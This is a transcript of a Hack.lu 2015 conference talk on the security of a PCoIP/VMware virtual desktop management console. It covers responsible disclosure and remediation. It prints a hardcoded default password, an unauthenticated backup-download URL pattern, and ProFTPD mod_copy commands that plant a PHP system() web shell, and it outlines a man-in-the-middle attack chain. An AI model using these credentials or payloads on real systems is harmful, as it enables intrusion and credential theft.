security of virtual desktop infrastructures-maxime clementz-simon petitjean

55
Hack.lu 2015 Security of Virtual Desktop Infrastructures Maxime Clementz Simon Petitjean October 2015 from great concepts to bad surprises www.pwc.lu/en/information-communication-technology/cyber-security.html

Upload: feiber-villazon-cardenas

Post on 29-Jan-2016

6 views

Category:

Documents


1 download

DESCRIPTION

Seguridad de infraestructuras virtuales

TRANSCRIPT

Page 1: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

Hack.lu 2015

Security of Virtual Desktop Infrastructures

Maxime ClementzSimon Petitjean

October 2015

from great concepts to bad surprises

www.pwc.lu/en/information-communication-technology/cyber-security.html

Page 2: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

We have built a steady growing team of Cyber Security and Information Riskexperts to help companies assess and improve their security level in term ofconfidentiality, integrity and availability.

Our usual activities are:

- Vulnerability Assessments

- Risk Assessments

- Standards compliance (ISO 27k)

- Strategy, Governance & Management for Information Security

- Penetration tests

PwC Luxembourg

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Page 3: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Ethical Hacker In a Big4 Firm

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

What my mom thinks I doWhat society thinks I do What my colleagues think I do

What I actually doWhat I think I do

Page 4: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Maxime Clementz@maxime_tz

Hack.lu 2012 talk:

“Insecurity of Security Equipment”, with Mr Eric Chassard

3 years at PwC

Simon Petitjean@simonpetitjean

Hack.lu 2013 talk:

“Exploiting a vulnerability to quicken SAP discovery phase”

2 years at PwC

We belong to the Cyber Security Advisory team at PwC Luxembourg.We both got our IT engineer diploma from TELECOM Nancy (France).We spend more time together at work than with our respective girlfriends.

Speakers

Page 5: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Maxime Clementz@maxime_tz

Hack.lu 2012 talk:

“Insecurity of Security Equipment”, with Mr Eric Chassard

3 years at PwC

Simon Petitjean@simonpetitjean

Hack.lu 2013 talk:

“Exploiting a vulnerability to quicken SAP discovery phase”

2 years at PwC

We belong to the Cyber Security Advisory team at PwC Luxembourg.We both got our IT engineer diploma from TELECOM Nancy (France).We spend more time together at work than with our respective girlfriends.

Speakers

Eric Chassard

Page 6: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Agenda

1 Introduction

2 Great concepts

3 Bad surprises

4 Demo

5 Responsible disclosure outcome & Recommendations

6 Conclusion

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Page 7: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Introduction

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Page 8: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Virtual Desktop Infrastructure (VDI) hosts users' desktop environmentson remote servers which are accessed over a network using a remote displayprotocol from specific client software or hardware.

Introducing Virtual Desktop Infrastructures

Section 1 – Introduction

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Local User

Offshore

User

Teleworker

Thin-Client (or software-client)

Runs on top of a complete OS to dealwith network and graphical sessions.

Zero-Client

Doesn’t run a full OS but a firmwarededicated to specific tasks computed byspecialized hardware.

2

Page 9: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Plenty of solutions exists on the market. Amongst them:

- Citrix XenDesktops®

- VMware View®

- Oracle® VDI

- RedHat® Enterprise Virtualization

- Linux Terminal Server Project

- Microsoft® VDI

- …

Existing market solutions

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Section 1 – Introduction

3

Page 10: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

VDI leverages very technical and low level concepts. We first thought that ouranalysis would lead us to hardware hacking or binary reverse engineering.

It did not.

We did not even have to try complex attacks as the combination of simpleflaws allow an unauthorized person to perform a stable Man in theMiddle attack.

As such, we did not plunge RAM modules in liquid nitrogen nor dissolveproprietary microchip with acid

We had the opportunity to study one commercial implementation developed byTeradici® combined with VMware View® : the PCoIP® protocol.

Discussion

Section 1 – Introduction

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

4

Page 11: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Great concepts

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Page 12: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

PCoIP protocol

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

PCoIP Hardware Accelerator

PCoIP Servers

PCoIP Clients

USB peripheralsbridging

Thin-Client &

Soft-client

PCoIP Host Card

Workstation

Section 2 – Great concepts

6

Page 13: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

PCoIP protocol

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

PCoIP Hardware Accelerator

PCoIP Servers

PCoIP Clients

USB peripheralsbridging

Thin-Client &

Soft-client

PCoIP Host Card

Workstation

“Images rendered on the server arecaptured as pixels, compressed andencoded and then sent to the clientfor decryption and decompression.”

AES 256 over UDP

Section 2 – Great concepts

7

Page 14: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Zero-Client

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

“With the single purpose of image decompression anddecoding, the PCoIP processor eliminates endpointhard drives, graphic processors, operating systems,applications and security software.”

RISC CPU

Flash Memory(for the Firmware)

RAM

NIC card + basic I/O input (USB, sound, keyboard, mouse)

Section 2 – Great concepts

8

Page 15: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Basic implementation

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Section 2 – Great concepts

9

Page 16: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

User session initialisation sequence

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

LDAP

Section 2 – Great concepts

10

1

2 3

4

5

Page 17: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Zero-Client Management

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

SOAP (SSL-TLS)

Admin web interfaceTCP/443

TCP/50000

Admin web interfaceTCP/443

Admin web interfaceTCP/443

Section 2 – Great concepts

11

Page 18: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

From a security point of view, the concept of VDI seems to be a great asset:

- “empty shell” principle. No data is stored on the devices;

- Prevents data leakage: possibility not to forward physical ports (USB,FireWire…);

- Easy fine tuning to allow only specific users to log in to specific virtualiseddesktops (each user can be mapped to a dedicated desktop);

- Virtualised sessions. No more user-dependant update, easy snapshotting,easy maintenance and much more;

- PCoIP traffic is encrypted by default (AES 128/256-bit).

Security

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Section 2 – Great concepts

12

Page 19: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Bad surprises

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Page 20: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

First contact

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Real attack surface

Section 3 – Bad surprises

14

Page 21: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Testing approach

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

Section 3 – Bad surprises

15

Page 22: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Security assessmentPCoIP Management Console v1.10.3

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

The management console is available on Teradici’s website as an unencrypted.vmdk file. Thus, it is possible to easily mount and analyse it.

The MC is an Ubuntu based OS (last MC = LTS 12.04.5) with mostly standardcomponents.

SOAP 50000Console

Web80

443

FTP21

SQLSSH22

DHCPcUDP: 68

PostgreSQL 9.1.15

ProFTPD 1.3.4a

pcoip-management-consoleLinux 3.5.0-23

OpenSSH 5.9p1

Apache httpd 2.2.22, PHP/5.3.10, Suhosin-patch, OpenSSL/1.01

gSOAP httpd

Python 2.7.3

Section 3 – Bad surprises

16

Page 23: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Security assessmentPCoIP Management Console

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Mounting the .vmdk can be done using qemu-nbd or VMware features.

Browsing the filesystem, we extracted passwords from the config files.

The default SSH password

(Default) emptypassword forweb interface

FTP password (useless in our case)

Local database password(useless in our case)

Section 3 – Bad surprises

17

Page 24: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Security assessmentPCoIP Management Console

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Interesting fact 1: Teradici published an help page explaining how to changethe default “teradici” password on May 20, 2015.

Prior to this date, the password was not supposed to be known (nor changed ?)by users.

Interesting fact 2: The default password of user “teradici” is4400Dominion. Never underestimate the power of reconnaissance whentrying to bruteforce things.

Section 3 – Bad surprises

18

Page 25: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Security assessmentPCoIP Management Console

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

The local database stores everything in cleartext.

This database is used to store the MC’s configuration including interesting passwords:

- Management Console’s web admin password;

- Zero-Clients admin passwords;

It also stores profiles, groups, devices and all settings that can be applied to the Zero-Clients and the PCoIP infrastructure.

Local backups of this database can be generated via the Management Console.

Section 3 – Bad surprises

19

Page 26: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Security assessmentPCoIP Management Console

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Having access to the filesystem, we also listed the web pages used for the web-interface, and found out that some were reachable even unauthenticated:

- ArrayToXML.class.php

- BrowserNotSupported.php

- ConfirmDialog.php

- footer.php

- header.php

- JsDebug.php

- PeerAjax.php

- Troubleshoot-saveV2.php

Section 3 – Bad surprises

20

Page 27: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Security assessmentPCoIP Management Console

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

- BackupDBDownload.php

The management console (Python script) allows admins to backup the database. This php page, reachable from the web-ui, is called to download database backups.

A valid, world-accessible URL looks like:

Do you recognise what 1439480747 is ?

BackupDBDownload.php?filename=archives/1439480747/pcoip_mc_database_1439480747.archive

Section 3 – Bad surprises

21

Page 28: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Security assessmentPCoIP Management Console

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

EPOCH Time number of seconds that have elapsed since January 1, 1970(midnight UTC/GMT) “predictable”.

Assuming that a backup has been performed, the only thing we have to do is torequest this URL and decrement the timestamp until we find a backup …(aprox. 1200 tries/min with a 2 CPU / 2Gb RAM server VM).

That’s not the most efficient approach, but we will see later we can do better …

This approach will raise another issue: backups are encrypted. However,AES 256-bits is used, which does not help simplify the task.

Since the algorithm is pretty strong, it would really be a pity if the key washardcoded and common to every customer…

Section 3 – Bad surprises

22

Page 29: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Security assessmentPCoIP Management Console

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Backup of the database (and also encryption of the backup) is performed by theconsole’s Python script. Here is an extract:

#encrypt the tar.gz file and remove the tar.gz filearchive_name = os.path.join(dir_name, “%s.archive” % (basename))subprocess.call(“openssl enc –aes-256-cbc –salt –in %s –out %s –pass pass:4400Dominion” % (tar_name, archive_name), shell = True)os.remove(tar_name)

At the time of our tests, we did not find any documentation advising to changethis key which, by design, is common to every instance of the solution.

As previously seen, we can extract from this database almost everythingconcerning the configuration of the Zero-Client and the infrastructure.

Section 3 – Bad surprises

23

Page 30: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Security assessmentPCoIP Management Console

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Considering that default passwords for SSH and the web admin page are easy tochange, let’s pretend we can’t use these vectors (we like challenges!).

Then the access to the database archive depends on bruteforce, which is notreally smart and a bit noisy.

B-plan is to find a way to list backup filenames on the server.

Let’s have a look at the FTP service…

SOAP 50000Console

Web80

443

FTP21

SQLSSH22

DHCPcUDP: 68

pcoip-management-console

Section 3 – Bad surprises

24

Page 31: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Security assessmentPCoIP Management Console

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

The MC uses ProFTPD 1.3.4a

CVE-2015-3306 (published on 18/05/2015) - proftpd_modcopy_exec

Exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.

We simply leveraged the proftpd_modcopy_exec vulnerability to list the backup filenames:

CPFR /proc/self/cmdlineCPTO /tmp/.<?php system(ls);?>CPFR /tmp/.<?php system(ls);?>CPTO /opt/teradici.com-cmsystem/www/public/www/archives/ls.php

Section 3 – Bad surprises

25

Page 32: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Demo

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Page 33: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

Section 4 – Demo

27

Page 34: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/21TCP/443

TCP/50000

192.168.1.13

1

Section 4 – Demo

28

Page 35: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/21TCP/443

192.168.1.13

Hydra bruteforceor

ProFTPd exploit

2

Section 4 – Demo

29

Page 36: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/21TCP/443

192.168.1.13

Archive Download

3

Section 4 – Demo

30

Page 37: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/443

192.168.1.13

admin passwords+ IP addresses

+ settings+ last user

+…

TCP/443

4

Section 4 – Demo

31

Page 38: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/443

5

192.168.1.250

192.168.1.11

Rogue CA cert

Section 4 – Demo

32

Page 39: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/443

6

192.168.1.250

192.168.1.11

192.168.1.14

Proxy to real VCS

Section 4 – Demo

33

Page 40: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/443

7

192.168.1.250

192.168.1.11

192.168.1.14

Proxy to real VCS

Section 4 – Demo

34

Page 41: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/443

8

192.168.1.250

192.168.1.11

192.168.1.14

Proxy to real VCSForce re-connect

Section 4 – Demo

35

Page 42: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/443

9

192.168.1.250

192.168.1.11

192.168.1.14

Proxy to real VCSPassword

LDAP

Section 4 – Demo

36

Page 43: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/443

10

192.168.1.250

192.168.1.11

192.168.1.14

Proxy to real VCSVirtual

Desktop Session

Section 4 – Demo

37

Page 44: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Attack scenario

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/443

11

192.168.1.250

192.168.1.11

Section 4 – Demo

38

Page 45: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

BONUS

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Domain Controller

VMware View Connection Server / Horizon View

Management Console

TCP/50000

BONUS

TCP/443

SOAP (SSL-TLS)

TCP/50000

New rogue group/profile deployment!+ clear logs + …

Section 4 – Demo

39

Page 46: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Section 4 – Demo

40

Page 47: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Responsible disclosure outcome & Recommendations

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Page 48: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Responsible disclosure

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Timeline:

27-07-2015 Report sent to CIRCL

27-07-2015 CIRCL forwards to the editor

??-??-2015 Exchanges between CIRCL and the editor

07-08-2015 Editor says “[…] we have reviewed the findings you provided us and are working to provide and updated release that resolves these issues […]”

09-09-2015 Management Console v1.10.4 is out “This release is a security update. It is strongly recommended that all PCoIP Management Console users upgrade to this release.”

Section 5 – Responsible disclosure outcome & Recommendations

42

Page 49: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Responsible disclosure

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Editor’s fixes consist in:

1. Redirecting to login page when trying to reach BackupDBDownload.phpwithout being authenticated (like other pages).

2. Providing a way to change the archive encryption password.

Section 5 – Responsible disclosure outcome & Recommendations

43

Page 50: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Recommendations

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

- Change the default SSH password (or disable/block SSH)

- Change the default Web Admin password

- Change the default archive encryption password

- Use a dedicated Zero-Client admin password (cleartext in DB)

- Disable mod-copy in ProFTPd

- Network segregation : use ACL/firewall rules to protect the ports… (TCP/443& 22 from the Management VLAN, TCP/21, 50000 and 50100 from the Zero-Client VLAN…)

- Zero-Clients are 802.1x compatible!

- Lock the user interface on the Zero-Clients

Section 5 – Responsible disclosure outcome & Recommendations

44

Page 51: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Conclusion

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Page 52: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Outcome

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

- Combining several vulnerabilities allowed us to corrupt an entire VirtualDesktop Infrastructure, even in the context of an hardened environment

- Vulnerabilities have been reported following a Responsible Disclosurevia the CIRCL

- The editor deployed the fixes in a new release (v1.10.4) in a timely manner

Section 6 – Conclusion

46

Page 53: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

[TODO]

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Zero-Client

Domain Controller

VMware View Connection Server / Horizon View

LDAP

Management Console

SOAP (SSL-TLS)

Section 6 – Conclusion

47

Page 54: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

Thank you!

Hack.lu 2015 • Security of Virtual Desktop Infrastructures

Page 55: Security of Virtual Desktop Infrastructures-Maxime Clementz-Simon Petitjean

PwC

October 2015

This document was created using the official VMware icon and diagram library. Copyright © 2012 VMware, Inc.All rights reserved. This product is protected by U.S. and international copyright and intellectual property laws.VMware products are covered by one or more patents listed at http://www.vmware.com/go/patents.

VMware does not endorse or make any representations about third party information included in this document,nor does the inclusion of any VMware icon or diagram in this document imply such an endorsement.

Teradici and PCoIP are registered trademarks or trademarks of Teradici Corporation in the United States and/orother countries.

All trademarks, service marks, trade names, trade dress, product names and logos appearing on these slides are theproperty of their respective owners.

Hack.lu 2015 • Security of Virtual Desktop Infrastructures